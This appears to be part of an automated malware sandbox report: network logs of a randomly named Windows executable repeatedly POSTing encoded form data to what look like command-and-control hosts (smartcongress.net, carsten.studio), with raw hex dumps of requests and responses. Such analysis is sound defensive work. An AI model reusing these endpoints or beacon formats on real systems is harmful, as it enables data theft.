                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Referer: http://www.smartcongress.net/m1g9/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 50 77 6a 69 73 77 57 72 4c 41 62 4c 65 4e 54 42 78 65 4c 4c 71 70 56 70 48 42 77 4c 44 4a 76 54 67 41 66 52 73 6d 39 42 79 54 74 73 4b 5a 4f 61 50 43 56 70 39 59 4d 75 68 45 6f 33 56 54 48 4a 2f 52 35 4a 4a 4f 52 76 58 70 33 4a 4d 59 37 6b 78 59 78 37 72 46 43 53 4b 55 65 38 47 71 49 6f 76 69 44 4e 6c 37 43 69 57 47 67 6f 72 6c 6e 46 56 48 4f 56 39 42 64 6b 56 49 33 64 32 65 68 72 68 76 37 77 33 50 66 47 62 33 76 48 45 30 64 73 58 59 44 4e 4a 31 57 44 54 78 64 65 59 41 6a 70 63 75 6f 73 42 76 46 72 54 4b 45 7a 6a 76 66 4e 49 52 68 58 79 42 39 77 6e 77 50 38 63 34 31 65 51 6c 2f 31 61 6c 72 6f 4b 6c 7a 45 2b 65 4c 72 4f 72 58 72 5a 57 4f 39 2b 61 38 74 6b 42 6a 33 52 53 4d 36 64 6a 62 71 74 69 69 75 38 36 62 76 6a 47 34 34 71 65 62 2f 33 41 57 74 37 70 57 59 38 36 66 54 76 68 67 5a 7a 39 71 33 34 4a 6d 46 41 41 6f 4b 6a 72 2b 53 66 56 64 70 6b 46 6f 34 33 53 4f 73 38 6f 57 54 38 4c 6c 6e 4e 6f 77 62 2f 4b 52 69 77 70 52 77 63 51 41 6d 64 38 62 63 36 4f 68 [TRUNCATED]
                                                                                                            Data Ascii: x4=PsWFZnsR91nuPwjiswWrLAbLeNTBxeLLqpVpHBwLDJvTgAfRsm9ByTtsKZOaPCVp9YMuhEo3VTHJ/R5JJORvXp3JMY7kxYx7rFCSKUe8GqIoviDNl7CiWGgorlnFVHOV9BdkVI3d2ehrhv7w3PfGb3vHE0dsXYDNJ1WDTxdeYAjpcuosBvFrTKEzjvfNIRhXyB9wnwP8c41eQl/1alroKlzE+eLrOrXrZWO9+a8tkBj3RSM6djbqtiiu86bvjG44qeb/3AWt7pWY86fTvhgZz9q34JmFAAoKjr+SfVdpkFo43SOs8oWT8LlnNowb/KRiwpRwcQAmd8bc6OhKV7FxpZw/5sUwU9UzDJNipyEqWRAayGbmvp3+74NPGCzA7rI1ibdpTrQo2Y2GK6kks5jEPbiZenqPkNy3KbqyU7r6r3EwqS+pKqPcAIRcVbjE2i6dtb3f/1x6Kbq+4UQ1wQSkVHeqULsReGtrYt80nJrv4ccWe99YywRB3q8TjgN5ohJ7Pw6P2MwRp5E4Bt9a8YCIRWwJ8JOwbNJ/EuGLD+zWzImRvV6diiRd03fpCyso6mbhaeifNagFZzhkwsvsnrVvRTS9+hXAmMC1S39Krnn7J34Sr+fvhnmQGOQoDclIZtb/EjEGnqbAbqoIe/qsSCcoES5XSdiRp8+YNBE0DWf8QnjwRfLUIyy27rpOkzFLOcwYyh50v/S8Y4lWP/CZUP6n9AMpZoJLLVQ6OJFTdORmHgBONe89Woci9eDLpQw3RgAk01y3fbFBDUWCMkMYeuktUN6YYBHUP7YAMtarBih9a+OKKj2B4FRQsjmxA++zTSQL6cUggjIZZi1YaMhsnlI62rE5K6GfXpJ0avntMQrG5Ua4yZveaRNUQ/UvO42CnfFFsYO/WeEQ5KuPj4TZBtYduGgI1aYAt1JNbXf8J/IvIHy/fOB4gbsj7RRGi6sLWANDBg1XsSGjMkbMV0/ULKNDbHThU6+BgIIIAFNKPhFzoHOHlqKms [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:33.240523100 CET1773OUTData Raw: 45 30 2f 34 78 76 6d 31 58 76 74 6d 48 63 58 36 77 61 54 5a 79 66 55 64 6b 69 52 36 32 37 6e 78 54 45 41 6c 2f 69 35 6f 64 4e 72 59 78 32 64 33 32 64 68 33 72 39 77 61 74 4d 6e 53 2f 32 37 48 78 34 75 31 4f 72 36 76 4f 35 38 4c 6c 49 6e 75 79 58
                                                                                                            Data Ascii: E0/4xvm1XvtmHcX6waTZyfUdkiR627nxTEAl/i5odNrYx2d32dh3r9watMnS/27Hx4u1Or6vO58LlInuyXkNEQy/qS81GFF5hcdFsju/GtLqeF/RlZMocfjp1IqovFUhe1aDPi5o4KaprpvNhV/VUIVflj+OBOskwjV4bobCbfxWYrj49FwVCf8WyBsaYDXFyD/MOJAB0TXT2iIKfrN2yJ0R5ga2MF9dxee8vwNT/Wh1pqQvKO+
                                                                                                            Dec 12, 2024 10:22:34.499677896 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:34 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.2249194146.88.233.115801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:35.774292946 CET546OUTGET /m1g9/?x4=Cu+laRdL4iPyeXPOvnXbHATCRLbFtZvgmbFpChU/EeiHg3j+sEFT+StkZuqTMzkW17xuxTA+IyjM3SxoNr0bNIrAJ4iZv6YB/kmuH0GNS74UnHLgt4utBlkurB62&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:37.055391073 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:36 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.2249195217.160.0.200801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:42.837428093 CET2472OUTPOST /8mom/ HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.carsten.studio
                                                                                                            Referer: http://www.carsten.studio/8mom/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 69 31 2f 4a 62 70 33 4c 6d 4c 43 4a 38 36 47 44 6e 75 75 43 75 78 46 32 65 53 65 37 66 2f 77 4b 58 5a 7a 47 79 32 56 47 67 55 57 61 6d 37 53 7a 64 30 69 47 74 7a 79 76 4a 37 45 30 35 45 66 72 64 58 56 66 4a 32 68 74 61 56 33 37 4e 6b 62 77 4a 4f 58 51 6c 69 75 66 69 6a 35 72 52 74 45 55 47 79 66 78 77 4c 44 48 75 76 55 47 49 47 56 6b 67 37 78 34 45 64 62 31 47 72 44 49 35 48 66 4d 43 59 56 31 55 61 6f 32 35 33 4a 70 63 45 39 34 48 33 35 70 4b 55 2b 2b 61 66 59 64 52 55 4b 62 4c 65 53 4f 4c 71 38 69 46 51 35 76 41 69 4a 78 44 77 45 73 68 44 31 2f 35 34 6c 74 46 61 31 7a 51 41 4f 6f 56 42 47 72 6d 4d 2b 65 36 73 77 74 44 4a 6d 4a 6d 62 4a 5a 4f 72 53 76 54 6d 73 32 6c 76 61 6e 6d 4f 41 4d 74 70 46 67 59 37 78 38 62 61 39 4c 6b 6e 32 77 50 6a 41 37 31 6d 39 78 7a 75 30 67 41 42 74 55 51 76 76 68 69 36 69 5a 35 67 6f 58 57 58 59 4f 32 78 52 4a 52 30 62 75 4e 51 4d 4a 6f 38 6f 55 4d 6a 4c 48 54 62 57 49 64 49 78 4f 4a 6b 70 65 49 2f 49 51 75 7a 79 6a 38 34 6b 77 44 5a 4f 68 37 77 6d 70 49 45 53 [TRUNCATED]
                                                                                                            Data Ascii: x4=i1/Jbp3LmLCJ86GDnuuCuxF2eSe7f/wKXZzGy2VGgUWam7Szd0iGtzyvJ7E05EfrdXVfJ2htaV37NkbwJOXQliufij5rRtEUGyfxwLDHuvUGIGVkg7x4Edb1GrDI5HfMCYV1Uao253JpcE94H35pKU++afYdRUKbLeSOLq8iFQ5vAiJxDwEshD1/54ltFa1zQAOoVBGrmM+e6swtDJmJmbJZOrSvTms2lvanmOAMtpFgY7x8ba9Lkn2wPjA71m9xzu0gABtUQvvhi6iZ5goXWXYO2xRJR0buNQMJo8oUMjLHTbWIdIxOJkpeI/IQuzyj84kwDZOh7wmpIES3sz9yiwPghITaDq9DYPNIX/Oa4iyDSboAiX4U+bR+VDd2sBDb4lraU0RuJeMOxfaRW2w1imIyIxiJzCx4tw/h2cz8m7cUSjSYDPBo4REo6Q8fVmAhbdXw2Sx6mjU2eNCqs69yNXfnF43nyYO67PAiNZC49unqrSByEjZK8+ssVlZ/YKPKhHkDahrjjvMlYAKYT91CF94H44i12u8HkURGeSSAroT0y+x0stZkjfLPUPyWZaTepTqEcpRDEMLI3wNr5jFn7vqe9CBuORizeZfTxz4sYf0kDydbEDAgHyKvBdOeXLUVSiyxzZkm0jrmPg9pgiF0C7IHPmIOZR9Kgstk0pn0N2WH129EmSftl69s2BuX0k3EmFHaqal7e8szUGhyUOf8v7a9JDfM8l/7l6h/9vu/RuYIwXWj8ylII4NImG5rkLT8eQe5GUPZgC1P6PMP49qaqsCisdjyCe2qkq17Hvxu+1XBD/8QRe4yOvUwzZvVAt2VVsHdRvLc6Il8Xr0hYt0Hvb2ArU7KEqZUebfXrtAUzwQ6AJTgkVg690i+38JRgdIypKRCln3VXU832Bo3PHE4V4sxGXEWXQT2Cv5gyp90BkXNIkjqtE5I2Islh01gTOnEnrWZayQEEp40AA70ONOlYtVHQJhUQHNhM1Dk7E2k0Mxv1Dkxl [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:42.957237959 CET300OUTData Raw: 58 4f 49 72 48 61 77 4b 42 73 6b 39 33 48 77 77 6d 75 5a 4e 54 45 35 49 34 72 4d 77 43 52 7a 75 69 58 71 69 6d 61 42 66 45 75 7a 46 39 4f 78 46 53 35 76 44 74 77 74 6c 62 59 67 67 74 77 43 7a 42 68 41 4b 37 41 31 68 42 74 6a 78 71 62 30 77 6a 36
                                                                                                            Data Ascii: XOIrHawKBsk93HwwmuZNTE5I4rMwCRzuiXqimaBfEuzF9OxFS5vDtwtlbYggtwCzBhAK7A1hBtjxqb0wj6IM1D1vxhRk9pYnCMoVQSqvEkQUR0URt3svPIpQACXyGeSoeqTeN53eNbkiQSJW2+s1WzdMTyhgVbElilxwWpBqDW9abb3xJLgjGGZZMu+OTYvZjb+SheyipiVqQlrMh9h0AlIiRMzp3VqtKjfuiCnasnivo8IN27V
                                                                                                            Dec 12, 2024 10:22:44.106810093 CET1236INHTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:43 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                            Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:44.106861115 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                            Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.2249196217.160.0.200801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:45.507126093 CET811OUTPOST /8mom/ HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.carsten.studio
                                                                                                            Referer: http://www.carsten.studio/8mom/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 69 31 2f 4a 62 70 33 4c 6d 4c 43 4a 38 37 47 44 31 4c 43 43 6f 52 46 32 58 43 65 37 49 76 77 49 58 5a 2f 4f 79 30 34 62 6a 6c 4f 61 68 71 69 7a 63 42 57 47 75 7a 79 75 47 62 45 6f 33 6b 65 70 64 58 56 55 4a 32 74 74 61 56 6a 37 4e 47 6a 77 50 4c 37 54 36 43 75 64 33 7a 35 71 52 74 41 6e 47 79 54 66 77 4c 37 48 75 73 41 47 4a 47 46 6b 6d 59 5a 34 56 39 62 7a 4e 4c 43 53 35 47 6a 5a 43 59 6c 39 55 62 6b 32 34 47 56 70 63 52 42 34 52 77 56 70 44 30 2b 2f 51 2f 59 4e 52 6d 61 52 4a 63 47 6c 44 35 38 72 4e 53 42 56 4b 78 70 6b 50 79 52 6c 67 52 64 70 79 66 49 6c 4d 2b 63 32 4e 67 3d 3d
                                                                                                            Data Ascii: x4=i1/Jbp3LmLCJ87GD1LCCoRF2XCe7IvwIXZ/Oy04bjlOahqizcBWGuzyuGbEo3kepdXVUJ2ttaVj7NGjwPL7T6Cud3z5qRtAnGyTfwL7HusAGJGFkmYZ4V9bzNLCS5GjZCYl9Ubk24GVpcRB4RwVpD0+/Q/YNRmaRJcGlD58rNSBVKxpkPyRlgRdpyfIlM+c2Ng==
                                                                                                            Dec 12, 2024 10:22:46.771797895 CET1236INHTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:46 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                            Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:46.771863937 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                            Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.2249197217.160.0.200801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:48.203142881 CET2472OUTPOST /8mom/ HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.carsten.studio
                                                                                                            Referer: http://www.carsten.studio/8mom/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 69 31 2f 4a 62 70 33 4c 6d 4c 43 4a 36 71 32 44 6d 34 61 43 35 42 46 31 54 79 65 37 66 2f 77 45 58 5a 7a 4f 79 32 56 47 67 58 43 61 6d 39 4f 7a 63 6b 69 47 73 7a 79 75 41 62 45 30 35 45 66 71 64 55 70 32 4a 33 64 62 61 58 50 37 4e 6c 62 77 4a 4a 6a 51 79 53 75 66 36 54 35 74 52 74 41 79 47 79 44 6c 77 4c 76 70 75 73 59 47 49 31 74 6b 67 6f 5a 33 4c 4e 62 7a 4e 4c 43 57 35 47 6a 78 43 5a 42 6c 55 61 39 72 35 77 35 70 64 30 39 34 57 58 35 71 46 30 2b 37 65 66 59 62 52 55 48 6a 4c 65 53 4b 4c 70 41 62 46 51 31 76 42 78 42 78 44 78 45 74 75 7a 31 38 39 34 6c 74 4b 36 31 78 51 41 50 33 56 42 47 72 6d 50 61 65 37 38 77 74 44 4d 4b 49 69 62 4a 5a 53 37 53 59 5a 47 77 69 6c 75 2f 45 6d 4f 77 32 74 61 4a 67 5a 35 70 38 66 71 39 4c 69 58 32 36 50 6a 41 38 36 47 39 48 7a 75 73 47 41 42 39 45 51 76 76 68 69 2f 32 5a 76 7a 41 58 55 48 59 4f 35 52 52 4d 59 55 62 70 4e 52 34 6e 6f 38 63 55 4d 69 54 48 52 72 6d 49 66 4e 74 4e 43 30 70 62 4d 2f 49 65 6b 6a 79 36 38 2b 42 56 44 5a 32 62 37 78 57 70 49 42 47 [TRUNCATED]
                                                                                                            Data Ascii: x4=i1/Jbp3LmLCJ6q2Dm4aC5BF1Tye7f/wEXZzOy2VGgXCam9OzckiGszyuAbE05EfqdUp2J3dbaXP7NlbwJJjQySuf6T5tRtAyGyDlwLvpusYGI1tkgoZ3LNbzNLCW5GjxCZBlUa9r5w5pd094WX5qF0+7efYbRUHjLeSKLpAbFQ1vBxBxDxEtuz1894ltK61xQAP3VBGrmPae78wtDMKIibJZS7SYZGwilu/EmOw2taJgZ5p8fq9LiX26PjA86G9HzusGAB9EQvvhi/2ZvzAXUHYO5RRMYUbpNR4no8cUMiTHRrmIfNtNC0pbM/Iekjy68+BVDZ2b7xWpIBG3hy9yiAPj7YSTVa4MYPFqX/aK4g2DSJMA0hULwLQ3QDdsoBDX4lu7U1xuJPUOwcSRSFo6yWI1DRi4mSxKt0Wi2djsmJEUTTSYEs5pwhEXuA9KfGAJbdXC2X8PhSc2eMyq1PRyNXfgA43bnIDv7PNKNfmo9orqrjxyEm1Kx+ssfFZCRqPqhHwTahzZkfYlYjCYeedCDd5hj4iO7O8wkQ1GeTndrpr0xfx0qMZk2PL1XPzMZaSlpTe+cpA+EJ7I3xNr7mxn3PqfxiBiYhiAeZXDxyUGYaIkCUtbXh4gGSKtDdOeYrVISiK+zcUQ0hHmORNp1yEGMbIECGINdR9igs9k0pr0N3iH1BpExR3tpq9ipRvC6FL4mFXwqbxRe9AzVXhyD93/2baBMDeN4l+Ul6hj9u3nRf4IxG2j5XJLLYNPsm58gLTMeQPuGQGCgRBP6P8P4PyapcCisdjtCe2ukq5oHqNE+1XBCu8QRtcya/U1xZvOLN3MVsC0Rvj26J58X5shYt0EhL2Di07NEqlJebf5rtcUzmQ6BbLgn3I6tki+hsJeq9I3pKQZlm77XV833xI3MF87IYs0AXEMNgP1Cvl4ypZ0BXDNKxfqtU5ItIsmpU11MfbYnrK3azhDEcU0aTz0Dqi6Q9VGUJhWQHARM1La7Hm00OBv0jkxk [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:48.326210022 CET1764OUTData Raw: 58 4f 4a 79 48 5a 70 56 42 75 41 39 33 43 4d 77 68 4e 78 4e 54 6b 35 58 36 72 4d 45 43 52 79 78 69 58 69 51 6d 62 74 50 45 6f 50 46 73 63 4a 46 54 6f 76 44 67 67 74 6a 62 59 67 75 79 41 50 4a 42 68 42 37 37 41 78 68 42 74 7a 78 71 5a 73 77 67 4b
